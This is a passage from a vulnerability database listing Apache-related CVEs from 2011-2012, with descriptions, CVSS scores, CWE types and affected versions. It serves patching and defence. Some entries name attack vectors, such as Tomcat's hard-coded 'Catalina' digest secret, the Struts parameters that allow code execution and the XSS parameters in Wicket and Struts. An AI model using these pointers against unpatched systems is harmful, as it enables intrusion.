apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-5064 MEDIUM

DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2012-0021 LOW

The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.2.21
apache http_server 2.2.20
apache http_server 2.2.17
apache http_server 2.2.18
apache http_server 2.2.19
CVE-2012-0022 MEDIUM

Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache tomcat 5.5.34
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 7.0.21
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2012-0031 MEDIUM

scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
redhat jboss_enterprise_web_server 1.0.0
debian debian_linux 6.0
debian debian_linux 7.0
redhat enterprise_linux_desktop 6.0
suse linux_enterprise_server 10
debian debian_linux 5.0
opensuse opensuse 11.4
redhat enterprise_linux_server 6.0
redhat enterprise_linux_server_aus 6.2
redhat enterprise_linux_workstation 6.0
redhat storage 2.0
redhat enterprise_linux_eus 6.2
suse linux_enterprise_software_development_kit 10
CVE-2012-0037 MEDIUM

Redland Raptor (aka libraptor) before 2.0.7, as used by OpenOffice 3.3 and 3.4 Beta, LibreOffice before 3.4.6 and 3.5.x before 3.5.1, and other products, allows user-assisted remote attackers to read arbitrary files via a crafted XML external entity (XXE) declaration and reference in an RDF document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
libreoffice libreoffice 3.3.4
libreoffice libreoffice 3.4.1
apache openoffice.org 3.4
redland libraptor *
libreoffice libreoffice 3.4.0
fedoraproject fedora 17
fedoraproject fedora 16
redhat enterprise_linux_server 6.0
libreoffice libreoffice 3.5.0
redhat storage 2.0
redhat storage_for_public_cloud 2.0
redhat enterprise_linux_eus 6.2
libreoffice libreoffice 3.3.1
libreoffice libreoffice 3.3.3
apache openoffice 3.4.0
redhat enterprise_linux_desktop 5.0
apache openoffice.org 3.3
debian debian_linux 6.0
libreoffice libreoffice 3.3.0
librdf raptor *
libreoffice libreoffice 3.5
apache openoffice 3.3.0
redhat enterprise_linux_desktop 6.0
redhat gluster_storage_server_for_on-premise 2.0
libreoffice libreoffice 3.4.5
libreoffice libreoffice 3.4.2
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_server_aus 6.2
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server 5.0
libreoffice libreoffice 3.3.2
libreoffice libreoffice *
CVE-2012-0047 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache wicket 1.4.10
apache wicket 1.4.2
apache wicket 1.4.18
apache wicket 1.4.15
apache wicket 1.4.16
apache wicket 1.4.6
apache wicket 1.4.9
apache wicket 1.4.5
apache wicket 1.4.12
apache wicket 1.4.0
apache wicket 1.4.8
apache wicket 1.4.14
apache wicket 1.4.1
apache wicket 1.4.3
apache wicket 1.4.17
apache wicket 1.4.4
apache wicket 1.4.13
apache wicket 1.4.11
apache wicket 1.4.7
apache wicket 1.4.19
CVE-2012-0053 MEDIUM

protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
redhat jboss_enterprise_web_server 1.0.0
debian debian_linux 6.0
debian debian_linux 7.0
redhat enterprise_linux_desktop 6.0
suse linux_enterprise_server 10
debian debian_linux 5.0
opensuse opensuse 11.4
redhat enterprise_linux_server 6.0
redhat enterprise_linux_workstation 6.0
redhat storage 2.0
redhat enterprise_linux_eus 6.2
suse linux_enterprise_software_development_kit 10
CVE-2012-0256 MEDIUM

Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache traffic_server 2.1.1
apache traffic_server 2.1.2
apache traffic_server 3.0.1
apache traffic_server 2.0.1
apache traffic_server 2.1.7
apache traffic_server 2.1.8
apache traffic_server 3.0.3
apache traffic_server 3.0.0
apache traffic_server 3.1.1
apache traffic_server 2.1.6
apache traffic_server 3.1.0
apache traffic_server 2.0.0
apache traffic_server 2.1.5
apache traffic_server 3.0.2
apache traffic_server 2.1.3
apache traffic_server 2.1.4
apache traffic_server 2.1.0
apache traffic_server 2.1.9
apache traffic_server 3.1.2
CVE-2012-0391 HIGH

The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2012-0392 MEDIUM

The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts *
CVE-2012-0393 MEDIUM

The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts *
CVE-2012-0394 MEDIUM

The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2012-0803 HIGH

The WS-SP UsernameToken policy in Apache CXF 2.4.5 and 2.5.1 allows remote attackers to bypass authentication by sending an empty UsernameToken as part of a SOAP request.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache cxf 2.4.5
apache cxf 2.5.1
CVE-2012-0838 HIGH

Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts *
CVE-2012-0840 MEDIUM

tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache portable_runtime 1.3.6
apache portable_runtime 0.9.2-dev
apache portable_runtime 0.9.2
apache portable_runtime 0.9.1
apache portable_runtime 1.3.13
apache portable_runtime 1.3.7
apache portable_runtime 1.3.9
apache portable_runtime 0.9.5
apache portable_runtime 0.9.7
apache portable_runtime 0.9.9
apache portable_runtime 1.3.5
apache portable_runtime *
apache portable_runtime 0.9.3
apache portable_runtime 1.3.10
apache portable_runtime 1.3.12
apache portable_runtime 1.3.3
apache portable_runtime 1.4.0
apache portable_runtime 1.3.4-dev
apache portable_runtime 0.9.7-dev
apache portable_runtime 0.9.3-dev
apache portable_runtime 1.3.11
apache portable_runtime 1.3.1
apache portable_runtime 1.3.0
apache portable_runtime 0.9.4
apache portable_runtime 1.3.2
apache portable_runtime 1.4.4
apache portable_runtime 0.9.6
apache portable_runtime 1.3.6-dev
apache portable_runtime 1.3.8
apache portable_runtime 0.9.8
apache portable_runtime 1.4.2
apache portable_runtime 1.3.4
apache portable_runtime 1.4.3
apache portable_runtime 0.9.16-dev
apache portable_runtime 1.4.1
CVE-2012-0880 HIGH

Apache Xerces-C++ allows remote attackers to cause a denial of service (CPU consumption) via a crafted message sent to an XML service that causes hash table collisions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache xerces-c++ -
CVE-2012-0881 HIGH

Apache Xerces2 Java Parser before 2.12.0 allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache xerces2_java *
CVE-2012-0883 MEDIUM

envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
apache http_server 2.4.1
opensuse opensuse 11.4
opensuse opensuse 12.1
CVE-2012-1006 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 2.0.14
apache struts 2.2.3
CVE-2012-1007 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 1.3.10
CVE-2012-1089 MEDIUM

Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache wicket 1.4.2
apache wicket 1.4.15
apache wicket 1.4.16
apache wicket 1.4.6
apache wicket 1.4.9
apache wicket 1.4.5
apache wicket 1.4.12
apache wicket 1.4.0
apache wicket 1.5.4
apache wicket 1.4.14
apache wicket 1.4.1
apache wicket 1.4.3
apache wicket 1.4.4
apache wicket 1.4.13
apache wicket 1.4.11
apache wicket 1.5.1
apache wicket 1.4.10
apache wicket 1.4.18
apache wicket 1.5.2
apache wicket 1.5.3
apache wicket 1.4.8
apache wicket 1.4.17
apache wicket 1.5.0
apache wicket 1.4.7
apache wicket 1.4.19
CVE-2012-1149 HIGH

Integer overflow in the vclmi.dll module in OpenOffice.org (OOo) 3.3, 3.4 Beta, and possibly earlier, and LibreOffice before 3.5.3, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted embedded image object, as demonstrated by a JPEG image in a .DOC file, which triggers a heap-based buffer overflow.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-189,

Products Affected

Vendor Product Version
redhat enterprise_linux_desktop 5.0
debian debian_linux 6.0
debian debian_linux 7.0
apache openoffice.org 3.4
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_server_eus 6.2.z
fedoraproject fedora 16
redhat enterprise_linux 5.0
apache openoffice.org 3.3.0
redhat enterprise_linux_server 6.0
redhat enterprise_linux_server_aus 6.2
redhat enterprise_linux_workstation 6.0
fedoraproject fedora 15
libreoffice libreoffice *
CVE-2012-1181 MEDIUM

fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache mod_fcgid 2.3.6
CVE-2012-1574 MEDIUM

The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache hadoop 0.20.204.0
cloudera cloudera_cdh cdh3
apache hadoop 0.20.205.0
apache hadoop 0.23.0
apache hadoop 1.0.1
apache hadoop 0.20.203.0
cloudera hadoop 0.20-sbin
apache hadoop 0.23.1
cloudera hadoop 0.20.2+923
apache hadoop 1.0.0
cloudera hadoop 0.20.1+169
CVE-2012-1592 MEDIUM

A local code execution issue exists in Apache Struts2 when processing malformed XSLT files, which could let a malicious user upload and execute arbitrary files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-434,

Products Affected

Vendor Product Version
apache struts 2.0.0
CVE-2012-1621 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.02 allow remote attackers to inject arbitrary web script or HTML via (1) a parameter array in freemarker templates, the (2) contentId or (3) mapKey parameter in a cms event request, which are not properly handled in an error message, or unspecified input in (4) an ajax request to the getServerError function in checkoutProcess.js or (5) a Webslinger component request. NOTE: some of these details are obtained from third party information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 10.04.01
CVE-2012-1622 HIGH

Apache OFBiz 10.04.x before 10.04.02 allows remote attackers to execute arbitrary code via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache ofbiz 10.04
CVE-2012-2098 MEDIUM

Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache commons_compress *
CVE-2012-2138 MEDIUM

The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache org.apache.sling.servlets.post *
CVE-2012-2149 HIGH

The WPXContentListener::_closeTableRow function in WPXContentListener.cpp in libwpd 0.8.8, as used by OpenOffice.org (OOo) before 3.4, allows remote attackers to execute arbitrary code via a crafted Wordperfect .WPD document that causes a negative array index to be used. NOTE: some sources report this issue as an integer overflow.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-189,

Products Affected

Vendor Product Version
redhat enterprise_linux_desktop 5.0
apache openoffice.org 3.3
apache openoffice.org *
redhat enterprise_linux__optional_productivity_applications *
libwpd libwpd 0.8.8
CVE-2012-2334 MEDIUM

Integer overflow in filter/source/msfilter/msdffimp.cxx in OpenOffice.org (OOo) 3.3, 3.4 Beta, and possibly earlier, and LibreOffice before 3.5.3, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the length of an Escher graphics record in a PowerPoint (.ppt) document, which triggers a buffer overflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
libreoffice libreoffice 3.3.3
libreoffice libreoffice 3.3.4
apache openoffice.org 3.3
libreoffice libreoffice 3.3.0
libreoffice libreoffice 3.4.1
libreoffice libreoffice 3.5
apache openoffice.org 3.4
libreoffice libreoffice 3.4.0
libreoffice libreoffice 3.4.5
libreoffice libreoffice 3.4.2
libreoffice libreoffice 3.3.2
libreoffice libreoffice *
libreoffice libreoffice 3.3.1
CVE-2012-2378 MEDIUM

Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cxf 2.4.5
apache cxf 2.5.3
apache cxf 2.4.7
apache cxf 2.6.0
apache cxf 2.5.1
apache cxf 2.5.2
apache cxf 2.4.6
CVE-2012-2379 HIGH

Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cxf 2.4.4
apache cxf 2.4.5
apache cxf 2.6.0
apache cxf 2.5.0
apache cxf 2.5.3
apache cxf 2.4.7
apache cxf 2.4.1
apache cxf 2.4.3
apache cxf 2.5.1
apache cxf 2.4.0
apache cxf 2.5.2
apache cxf 2.4.2
apache cxf 2.4.6
CVE-2012-2380 MEDIUM

Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache roller 2.0
apache roller 0.9.6.4
apache roller 2.3
apache roller 1.2
apache roller 0.9.8.1
apache roller 1.0
apache roller 2.0.1
apache roller 4.0
apache roller 2.0.2
apache roller 2.1.1
apache roller 0.9.7.1
apache roller *
apache roller 0.9.6
apache roller 1.0.1
apache roller 0.9.7.2
apache roller 0.9.9
apache roller 0.9.6.3
apache roller 3.1
apache roller 4.0.1
apache roller 0.9.5
apache roller 1.1.1
apache roller 0.9.8.2
apache roller 0.9.7
apache roller 3.0
apache roller 1.3
apache roller 2.1
apache roller 1.1.2
apache roller 1.1
apache roller 0.9.8
CVE-2012-2381 LOW

Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache roller 2.0
apache roller 0.9.6.4
apache roller 2.3
apache roller 1.2
apache roller 0.9.8.1
apache roller 1.0
apache roller 2.0.1
apache roller 4.0
apache roller 2.0.2
apache roller 2.1.1
apache roller 0.9.7.1
apache roller *
apache roller 0.9.6
apache roller 1.0.1
apache roller 0.9.7.2
apache roller 0.9.9
apache roller 0.9.6.3
apache roller 3.1
apache roller 4.0.1
apache roller 0.9.5
apache roller 1.1.1
apache roller 0.9.8.2
apache roller 0.9.7
apache roller 3.0
apache roller 1.3
apache roller 2.1
apache roller 1.1.2
apache roller 1.1
apache roller 0.9.8
CVE-2012-2665 HIGH

Multiple heap-based buffer overflows in the XML manifest encryption tag parsing functionality in OpenOffice.org and LibreOffice before 3.5.5 allow remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted Open Document Text (.odt) file with (1) a child tag within an incorrect parent tag, (2) duplicate tags, or (3) a Base64 ChecksumAttribute whose length is not evenly divisible by four.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 11.10
redhat enterprise_linux_server_from_rhui_6 6.0
redhat enterprise_linux_for_power_big_endian 6.0
debian debian_linux 7.0
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux 6.0
redhat enterprise_linux_for_ibm_z_systems 6.0
canonical ubuntu_linux 12.04
redhat enterprise_linux_server 6.0
redhat enterprise_linux_workstation 6.0
canonical ubuntu_linux 11.04
libreoffice libreoffice *
CVE-2012-2687 LOW

Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 2.2.10
apache http_server 2.2.17
apache http_server 2.4.2
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.2.2
apache http_server 2.4.1
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.1
apache http_server 2.2.20
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.2.12
apache http_server 2.2.6
apache http_server 2.2.23
apache http_server 2.4.0
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.2.8
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.2.22
apache http_server 2.2.3
CVE-2012-3353 MEDIUM

The Apache Sling JCR ContentLoader 2.1.4 XmlReader used in the Sling JCR content loader module makes it possible to import arbitrary files in the content repository, including local files, causing potential information leaks. Users should upgrade to version 2.1.6 of the JCR ContentLoader

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache sling_jcr_contentloader 2.1.4
CVE-2012-3376 HIGH

DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache hadoop 2.0.0
CVE-2012-3446 MEDIUM

Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache libcloud *
CVE-2012-3451 MEDIUM

Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cxf *
CVE-2012-3499 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 2.2.10
apache http_server 2.2.17
apache http_server 2.4.2
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.2
apache http_server 2.2.2
apache http_server 2.4.3
apache http_server 2.4.1
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.1
apache http_server 2.2.20
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.2.12
apache http_server 2.2.6
apache http_server 2.2.23
apache http_server 2.4.0
